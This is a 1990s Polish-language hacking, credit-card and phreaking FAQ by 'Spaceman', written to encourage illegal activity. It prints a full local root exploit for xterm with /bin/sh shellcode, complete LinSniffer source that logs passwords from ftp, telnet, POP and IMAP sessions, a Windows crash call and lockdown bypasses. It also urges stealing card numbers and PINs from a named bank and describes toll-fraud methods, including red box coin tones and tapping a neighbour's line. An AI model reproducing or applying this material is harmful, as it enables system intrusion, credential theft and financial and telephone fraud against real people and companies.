                ********************************
                *      HACK/CC/PHREAK FAQ      *
                *            PART 1            *
                *  Spaceman (DrOmE oF tErRoR)  *
                *     All rights reserved      *
                *    Do not change any text    *
                ********************************
===================================================================
= Ten faq jest poswiecony wszelkim nielegalnym sprawom.           =
= Jest on w miare krotki, gdyz nie lubie sie rozpisywac.          =
= (a btw to jest 1 czesc). Jak ktos jest lamer to i tak           =
= nie zrozumie :-)                                                =
= Nie ponosze odpowiedzialnosci za to ze mozecie sobie zrobic     =
= krzywde. Jak cos komus nie pasuje to nie musi tego czytac .     =
= Dotychczas niewiele powstalo faqow w jezyku polskim o tej       =
= tematyce (ja osobiscie znam 2). Trzeba to zmienic :-) .         =
= Staralem sie nie kopiowac innych faqow. Zamiesczam tez          =
= troche nowosci.                                                 =
===================================================================
++++++++++++++++++++++++++++++++++++++++
I. HACK                                +
++++++++++++++++++++++++++++++++++++++++
1. Najslawniejsi hackerzy wszechczasow +
++++++++++++++++++++++++++++++++++++++++
2. Dziury w ActiveX                    +
++++++++++++++++++++++++++++++++++++++++
3. Exploity                            +
++++++++++++++++++++++++++++++++++++++++
4. Sniffery                            +
++++++++++++++++++++++++++++++++++++++++
5. Firewall                            +
++++++++++++++++++++++++++++++++++++++++
6. Bugi w Windows (3.x, 95, NT)        +
++++++++++++++++++++++++++++++++++++++++
II.CREDIT CARDS                        +
++++++++++++++++++++++++++++++++++++++++
1. Rodzaje kart kredytowych            +
++++++++++++++++++++++++++++++++++++++++
2. Jak zdobyc numery kart kredytowych  +
++++++++++++++++++++++++++++++++++++++++
III.PHREAKING                          +
++++++++++++++++++++++++++++++++++++++++
1. Boxy                                +
++++++++++++++++++++++++++++++++++++++++
2. Dzwonienie free z Polski            +
++++++++++++++++++++++++++++++++++++++++
==========================================================================
I. HACK
--------------------------------------------------------------------------
1. Najslawniejsi hackerzy wszechczasow.

Najslawniejszymi hackerami na swiecie sa oczywiscie:
-Kevin Mitnick (Kondor)
-John Draper (Captain Crunch)
Najciekawszym zajeciem Kevina bylo chodzenie po duzych firmach
komputerowych i wyludzanie hasel. Podajac sie za serwisanta
zdobywal haslo do systemu, a potem pobieral odpowiednie dane.
Najslynniejszym jego numerem bylo zadzwonienie do administratora
duzej firmy telekomnikacyjnej (AT&T). Podal sie on za prezesa owej
firmy i poprosil o haslo, ktore oczywiscie otrzymal hehe.
15 lutego 1995 zostal aresztowany w swoim domu. :=(
John Draper natomiast odkryl, ze gwizdek dostarczany razem z chrupkami
wydaje dzwiek o czestotliwosci 2600 Hz. Dzieki temu gwizdkowi, mozna
bylo realizowac bezplatne polacznia z dowolnym miejscem na swiecie.
Byl on rowniez wspoltworca "niebieskiej skrzynki". Zostal rowniez
aresztowany i skazany na pobyt w wiezieniu. :=(
Obecnie chodza sluchy, iz wznowil dzialalnosc.
==========================================================================
2. ActiveX

O problemach z ActiveX oraz przegladarka internetowa IE wie juz chyba kazdy.
Jest to totalny niewypal. Microsoft twierdzi oczywiscie, iz ActiveX dziala
poprawnie i nie posiada zadnych bledow. Przydaloby sie jednak to zmienic.
Nie bede tutaj pisal zrodel do kontrolek ActiveX, gdyz za duzo by pisac.
Dam po prostu odnosniki do stron WWW, gdzie mozna je znalezc oraz jeden
program do zamykania systemu bez pytania:
Program Exploder zamykajacy "bez pytania" system Windows 95:
http://www.halcyon.com/mclain/ActiveX/  (Dolaczylem go do faq)
Program ktory przenosi katalog c:/win95 do innego katalogu (uwaga dziala po
wejsciu na strone):
http://www.thur.de/home/steffen/rename.html
Ciekawa sprawa zaskoczyla nas niedawno niemiecka grupa Chaos Computer Group.
Dzieki ActiveX czlonkowie grupy dokonywali przelewow pieniedzy z kont
bankowych. (http://berlin.ccc.de/).
==========================================================================
3. Exploity

Jak wiecie exploity to niewielkie programy glownie pod Unixa, dzieki ktorym
mozemy "poprawic" sobie byt systemie, tzn. mozemy otrzymac status roota,
wylaczac quoty dyskowe, kasowac pliki innym uzytkownikom, etc.
Exploity dzialaja na rozne sposoby. NA przyklad przez maila,  deamona
syslogd, czy nawet dooma!.
Nie bede sie tu rozwodzil nad exploitami. Podaje zrodlo exploita na
zlamanie roota (testowane) w sytemach Slackware (wystarczy skompilowac):
-------------------------------------------------------------------------
/* CUT HERE
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define CXTERM_PATH "/usr/X11R6/bin/xterm"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   int i,OffSet = DEFAULT_OFFSET;

/* use a different offset if you find this program doesn't do the job */
   if (argc>1) OffSet = atoi(argv[1]);

   buff = malloc(2048);
   if(!buff)
   {
      printf("Buy more RAM!\n");
      exit(0);
   }
   ptr = buff;

   for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE;
i+=NOP_SIZE) {
        memcpy (ptr,nop,NOP_SIZE);
        ptr+=NOP_SIZE;
   }

   for(i=0;i < strlen(shellcode);i++)
      *(ptr++) = shellcode[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_sp() + OffSet;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   (void) fprintf(stderr,
         "This bug is discovered by Ming Zhang
(mzhang@softcom.net)\n");
    /* Don't need to set ur DISPLAY to exploit this one, cool huh? */
    execl(CXTERM_PATH, "xterm", "-xrm",buff, NULL);
}
/* CUT HERE
--------------------------------------------------------------------------
==========================================================================
4. Sniffery

Sniffer to program rowniez najczesciej spotykany w systemie UNIX,
dzieki ktoremu mozemy otrzymac informacje z innego komputera,
znajdujacego sie w sieci. Moze to byc na przyklad plik passwd, etc.
Sniffer wysyla pakiety do innego komputera, komputer sie gubi, i juz
mozemy sie bawic. Ale UWAGA! Latwo jest wykryc uruchomionego sniffera.
To ze root moze zobaczyc go przez proste komendy 'ps -aux', lub 'top' to
kazdy wie, ale na przyklad na ULTRIX-ie mozna go wykryc prosta komenda
pfconfig, pfstat. Aby rozwalic sniffera wystarczy poslac jakis pakiet,
albo zwykly ping.
Ponizej przedstawiam miejsca gdzie mozna znalezc ciekawe sniffery:
ftp://playground.sun.com
Sniffer bazujacy na systemie MS-DOS:
ftp.germany.eu.net:/pub/networking/inet/ethernet/ethdp103.zip
A tutaj zrodlo popraweiongo sniffera na linuxa
(mozecie to wyciac zeby nie zajmowal miejsca w faqu):
--------------------------------------------------------------------------
/*
LinSniffer 0.25
Mike Edulla and Frank Bowl
medulla@infosoc.com  bowl@fuckyou.com
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <linux/if.h>
#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>


int openintf(char *);
int read_tcp(int);
int filter(void);
int print_header(void);
int print_data(int, char *);
char *hostlookup(unsigned long int);
void clear_victim(void);
void cleanup(int);


struct etherpacket
{
   struct ethhdr eth;
   struct iphdr  ip;
   struct tcphdr tcp;
   char buff[8192];
}ep;

struct
{
   unsigned long      saddr;
   unsigned long      daddr;
   unsigned short     sport;
   unsigned short     dport;
   int                bytes_read;
   char               active;
   time_t             start_time;
} victim;

struct iphdr  *ip;
struct tcphdr *tcp;
int s;
FILE *fp;

#define CAPTLEN 512
#define TIMEOUT 30
#define TCPLOG "tcp.log"

int openintf(char *d)
{
   int fd;
   struct ifreq ifr;
   int s;
   fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
   if(fd < 0)
   {
      perror("cant get SOCK_PACKET socket");
      exit(0);
   }
   strcpy(ifr.ifr_name, d);
   s=ioctl(fd, SIOCGIFFLAGS, &ifr);
   if(s < 0)
   {
      close(fd);
      perror("cant get flags");
      exit(0);
   }
   ifr.ifr_flags |= IFF_PROMISC;
   s=ioctl(fd, SIOCSIFFLAGS, &ifr);
   if(s < 0) perror("cant set promiscuous mode");
   return fd;
}

int read_tcp(int s)
{
   int x;
   while(1)
   {
      x=read(s, (struct etherpacket *)&ep, sizeof(ep));
      if(x > 1)
      {
         if(filter()==0) continue;
         x=x-54;
         if(x < 1) continue;
         return x;
      }
   }
}

int filter(void)
{
   int p;
   p=0;
   if(ip->protocol != 6) return 0;
   if(victim.active != 0)
      if(victim.bytes_read > CAPTLEN)
      {
         fprintf(fp, "\n----- [CAPLEN Exceeded]\n");
         clear_victim();
         return 0;
      }
   if(victim.active != 0)
      if(time(NULL) > (victim.start_time + TIMEOUT))
      {
         fprintf(fp, "\n----- [Timed Out]\n");
         clear_victim();
         return 0;
      }
   if(ntohs(tcp->dest)==21)  p=1; /* ftp */
   if(ntohs(tcp->dest)==23)  p=1; /* telnet */
   if(ntohs(tcp->dest)==110) p=1; /* pop3 */
   if(ntohs(tcp->dest)==109) p=1; /* pop2 */
   if(ntohs(tcp->dest)==143) p=1; /* imap2 */
   if(ntohs(tcp->dest)==513) p=1; /* rlogin */
   if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
   if(victim.active == 0)
      if(p == 1)
         if(tcp->syn == 1)
         {
            victim.saddr=ip->saddr;
            victim.daddr=ip->daddr;
            victim.active=1;
            victim.sport=tcp->source;
            victim.dport=tcp->dest;
            victim.bytes_read=0;
            victim.start_time=time(NULL);
            print_header();
         }
   if(tcp->dest != victim.dport) return 0;
   if(tcp->source != victim.sport) return 0;
   if(ip->saddr != victim.saddr) return 0;
   if(ip->daddr != victim.daddr) return 0;
   if(tcp->rst == 1)
   {
      victim.active=0;
      alarm(0);
      fprintf(fp, "\n----- [RST]\n");
      clear_victim();
      return 0;
   }
   if(tcp->fin == 1)
   {
      victim.active=0;
      alarm(0);
      fprintf(fp, "\n----- [FIN]\n");
      clear_victim();
      return 0;
   }
   return 1;
}


int print_header(void)
{
   fprintf(fp, "\n");
   fprintf(fp, "%s => ", hostlookup(ip->saddr));
   fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest));
}

int print_data(int datalen, char *data)
{
   int i=0;
   int t=0;

   victim.bytes_read=victim.bytes_read+datalen;
   for(i=0;i != datalen;i++)
   {
      if(data[i] == 13) { fprintf(fp, "\n"); t=0; }
      if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
      if(t > 75) {t=0;fprintf(fp, "\n");}
   }
}


main(int argc, char **argv)
{
   s=openintf("eth0");
   ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
   tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
   signal(SIGHUP, SIG_IGN);
   signal(SIGINT, cleanup);
   signal(SIGTERM, cleanup);
   signal(SIGKILL, cleanup);
   signal(SIGQUIT, cleanup);
   if(argc == 2) fp=stdout;
   else fp=fopen(TCPLOG, "at");
   if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);}
   clear_victim();
   for(;;)
   {
      read_tcp(s);
      if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
      fflush(fp);
   }
}

char *hostlookup(unsigned long int in)
{
   static char blah[1024];
   struct in_addr i;
   struct hostent *he;

   i.s_addr=in;
   he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
   if(he == NULL) strcpy(blah, inet_ntoa(i));
   else strcpy(blah, he->h_name);
   return blah;
}

void clear_victim(void)
{
   victim.saddr=0;
   victim.daddr=0;
   victim.sport=0;
   victim.dport=0;
   victim.active=0;
   victim.bytes_read=0;
   victim.start_time=0;
}

void cleanup(int sig)
{
   fprintf(fp, "Exiting...\n");
   close(s);
   fclose(fp);
   exit(0);
}
--------------------------------------------------------------------------
==========================================================================
5. Firewall

Firewall jest jednym ze sposobow na zabezpieczenie dostepu do jednej
sieci z innej (niezaufanej). Ma on zastosowanie w duzych firmach,
agencjach rzadowych itp. Firewall to program, najczesciej na osobnym
komputerze. Dane wysylane w sieci sa filtrowane przez ten program.
Spotykane sa 2 rodzjaje "scian ogniowych" tzw. 'block traffic' oraz
'permit traffic'. Niektore firewalle przepuszczaja tylko e-mail,
inne nakladaja tylko restrykcje. Ogolnie rzecz biorac firewall zabezpiecza
siec przed nielegalnym dostepem z sieci (e.g.: internet). Na razie
udokumentowano 2 przypadki wlamania sie z ominieciem firewalla.
Aczkolwiek istnieje grupa ludzi (w wiekszosci producenci firewalli), ktora
zna bugi tego systemu. W nastepnej czesci opisze bardzo szczegolowo metody
na omijanie "scian ogniowych:
=========================================================================
6. Bugi w Windows

MICROSOFT(R) pomimo stwierdzen o niezawodnosci swoich produktow nie jeden
raz sie pomylil. Chocby to co opisalem w punkcie 2 paragrafu I (ActiveX).
Ale w tym punkcie przyjrzyjmy sie systemowi WINDOWS.
Istnieje prosta funkcja (prawdopodobnie nie opublikowana nigdzie), ktora
wiesza totalnie system WindowsNT (S&W), oraz system Windows95:
--------------------------------------------------------------------------
    ::SetWindowPos( m_hWnd, (HWND)0xFFFF, 0, 0, 0, 0, 3 );
--------------------------------------------------------------------------
Kod ten najlepiej skompilowac w Visual C++ 4.0.
Prawdopodobnie to wartosc 0xFFFF powoduje crash systemu :).

Jesli w systemie Windows (NT, 95, 3x) masz z jakis przyczyn zablokowane
wejscie do Dosa mozna to bardzo latwo zlamac.
1. Otworz program Write lub Wordpad.
2. Z poziomu write'a albo wordpada otworz plik c:\command.com
Otworzy sie okno dialogowe
3. Wybierz "bez konwersji"
4. Zapisz plik jako c:\windows\winhelp.exe
5. System powiadomi cie ze plik juz istanieje. Daj overwrite.
6. Nacisnij F1 (normalnie by sie otworzyl Help) i juz jestes w dosie.

Wchodzenie do dosa z poziomu WORD-a.
1. Uruchom WORD
2. Z menu narzedzia (tools) wybierz macro.
3. Wpisz jakas nazwe i kliknij "create"
Kiedy macro bedzie gotowe do wpisywania wpisz ktoras z 3 komend:
                  Dla Windows 3.1: Shell Environ$("COMSPEC")
                  Dla Windows  95: Shell Environ$("COMMAND")
                  Dla Windows  NT: Shell Environ$("CMD")

Wchodzenie do dosa w Windows95 podczas zakonczenia pracy systemu.
1. Zamknij system.
2. Zanim sie pokaze  "poczekaj na zamkniecie systemu lub teraz mozna
bezpiecznie wylaczyc komputer" wpisz CLS
Pokaze ci sie dos, ale wszystko bedzie male.
3. Wpisz  MODE CO80 a wszystko wroci do normy.
===========================================================================
II. CREDIT CARDS
---------------------------------------------------------------------------
1. Rodzaje kart

VISA Standard         -------------------
VISA Classic          4XXX XXX XXX XXX
VISA Gold             4XXX XXXX XXXX XXXX
Mastercard            5XXX XXXX XXXX XXXX
Eurocard              5XXX XXXX XXXX XXXX
American Express      37XX XXXXXX XXXXX
American Express Gold 3XXXXX XXXXXXXX XXXXXXX
Carte Blanche         38XXX XXXX XXXXX
Club S                -------------------
Discovercard          6XXX XXXX XXXX XXXX
DinersClub            3AXX XXXXXX XXXX
JCB                   35XX XXXX XXXX XXXX

To sa najwaznejsze karty. Byc moze jeszcze sa inne, ale nic o tym nie wiem.
Jak cos wiecie na ten temat to dajcie znac.
2. Jak zdobyc numery kart kredytowych
Istnieje jeden niezawodny sposob na zdobycie prawdziwych numerow.
Trzeba je... ukrasc. Najlepiej to zrobic w jakims banku. Polecam
Bank Zachodni S.A. :-). Najlepiej jeszcze sie dowiedziec o numer PIN
(Personal Identification Number). Zadne programy generujace numery cc
nie dzialaja! Moze programy te sprawdzaly sie w latach 70-80, ale teraz
sa zupelnie bezuzyteczne! Masz sznase 1 na 1000000 ze trafisz na wlasciwy
numer!.
===========================================================================
III.PHREAKING
---------------------------------------------------------------------------
1. Boxy (dotycza dzwonienia z zagranicy)

Box jest to skrzyneczka, dzieki ktorej mozemy sobie dzwonic za darmo.
Istnieje wiele modelow, ale ja wymienie te najwazniejsze.
-Blue Box- Skrzyneczka generujaca dzwieki o czestotli 2600 Hz potrzebnych
do dzwonienia za darmo (oszukuje centrale). Wymyslil ja John Draper
we wspolpracy z dwoma pozniejszymi producentami komputera Apple
(Steve Wozniak i Steve Jobs).
-Black Box- skrzynka montowana pomiedzy twoja linia a linia jakiejs firmy.
Nie placisz ty za rachunki tylko jakas biedna firma. Trudne do namierzenia.
Mozna rozmawiac jednorazowo do pol godziny, bo potem namierza
-Red Box- Podczas gdy wrzucasz monete do automatu generowane sa tony o 3
roznych czestotliwosciach:
---------------------------------------------------------------------------
Sygnal 5 centow      1700+2200hz  0.060s on
Sygnal 10 centow     1700+2200hz  0.060s on, 0.060s off, powtarzany 2 razy
Sygnal 25 centow     1700+2200hz  33ms on, 33ms off, powtarzany 5 razy
---------------------------------------------------------------------------
Skrzynka ta generuje te wlasnie 3 tony.
-Silver Box- generuje sygnal DTMF. kazdemu klawiszowi jest przyporzadkowana
czestotoliwosc (tak jak u nas w nowych centralach). Ponizej te
czestotliwosci dla odpowiednich klawiszy:

           *****************************
           *  1209 1336 1477 1633      *
           *                           *
           *   697   1    2    3    A  *
           *                           *
           *   770   4    5    6    B  *
           *                           *
           *   852   7    8    9    C  *
           *                           *
           *   941   *    0    #    D  *
           *****************************

2. Jak za darmo dzwonic z Polski.
To pytanie zadaje sobie kazdy uzytkownik modemu.

Postaram sie wyjasnic jakie sa sposoby.
Najlepszym sposobem jest sposob na VISAPHONE lub AT&T.
Dzwonimy do operatora, podajemy mu numer karty a rachunek za rozmowe
jest pobierany bezposrednio z "naszego" konta w banku.

VISAPHONE- platnosc kartami VISA CLASSIC lub VISA GOLD

AT&T LDC  [ (0)0-8001111-111 ]- platnosc kartami VISA,
                              American Express, AT&T, MasterCard .

Mozna oczywiscie probowac budowac boxy, ale z tego co wiem (moge sie mylic)
to w Polsce dziala tylko Silver box. Jak ktos chce to mam dokladne schematy
i nazwy czesci. Mozna sie zawsze podpiac pod sasiada, ale tez nie nalezy
przesadzac.
Istnieja rowniez darmowe numery (e.g.:080020034), ale raczej ta wersja
odpada. Mozna takze skorzystac z uslugi zwanej Callback. Wykrecamy numer,
modem w miejscu docelowym odbiera, rozlacza nasz i dzwoni do naszego
komputera. Dzieki temu rachunek placi firma.
============================================================================

To by bylo na tyle czesci 1. Uff mam nadzieje, ze znajdziecie tu cos dla
siebie. Nie dajcie sie zlapac :-)
BTW, uruchomilem Hack BBS (-/\HPA BBS/\-). Czynny codziennie od 22.00-8.00

 Spaceman
 e-mail: space@cybergal.com
 Probuj mnie lapac tez na IRC  (#hack, #hackpl, #sexpl)

                ----- \\'ill b updated soon -----
